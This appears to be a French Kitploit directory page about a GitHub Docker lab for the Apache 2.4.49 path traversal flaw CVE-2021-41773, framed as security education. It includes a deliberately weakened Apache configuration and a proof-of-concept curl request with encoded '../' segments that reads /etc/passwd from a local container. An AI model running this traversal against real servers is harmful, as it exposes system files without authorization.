Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2021-41773 — Environnement de laboratoire basé sur Docker pour la vulnérabilité de traversée de chemin Apache CVE-2021-41773, avec exploit PoC et guide détaillé pour les tests de sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/jiyun02/cve-2021-41773
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Environnement de laboratoire basé sur Docker pour la vulnérabilité de traversée de chemin Apache CVE-2021-41773, avec exploit PoC et guide détaillé pour les tests de sécurité et l'éducation.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rapport CVE-2021-41773 – Path Traversal Apache


Résumé

  • Vulnérabilité découverte dans Apache HTTP Server 2.4.49, permettant, selon la configuration du serveur web, d'exposer des fichiers sensibles du système via une attaque de Path Traversal.
  • Path Traversal : un attaquant peut accéder à des fichiers en dehors de la racine web en utilisant des chemins contenant ../.

Informations

  • Nom de la vulnérabilité : CVE-2021-41773
  • Version affectée : Apache HTTP Server 2.4.49
  • Type de vulnérabilité : Path Traversal
  • Correctif officiel : Patché à partir de la version 2.4.50

Configuration de l'environnement de test

  • Image de base : httpd:2.4.49 (DockerHub)
  • Mode de fonctionnement du conteneur : Dockerfile + docker-compose.yml
  • Port d'exécution : 8080 → mappé au port 80 du conteneur
  • Modification de la configuration Apache : remplacé par Require all granted (permettant le Path Traversal)

Méthode d'exécution de l'environnement

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

PoC de la vulnérabilité

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Étapes détaillées

  1. Exécution du répertoire pour le projet image
image
  1. Création du Dockerfile image

-> Image de base : httpd:2.4.49 (version contenant la vulnérabilité)

-> sed -i 's/Require all denied/Require all granted/g' : Autorise le Path Traversal et l'accès externe

  1. docker-compose.yml image

-> Définition d'Apache

-> Mappage du port 8080 vers le port 80 du conteneur

  1. Exécution de Docker

    image
  2. Exécution du PoC

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd contient des informations sensibles ; %2e est la forme encodée de .., qui permet de remonter d'un répertoire.

-> Manipulation du chemin pour que le serveur accède à /etc/passwd et l'affiche.

  1. Résultat de l'exécution image

-> Comme le montre l'image ci-dessus, il est possible d'accéder à des répertoires sensibles.


URL du dépôt accessible via fork

https://github.com/JIYUN02/cve-2021-41773

-> Historique des commits présent

Télécharger l’outil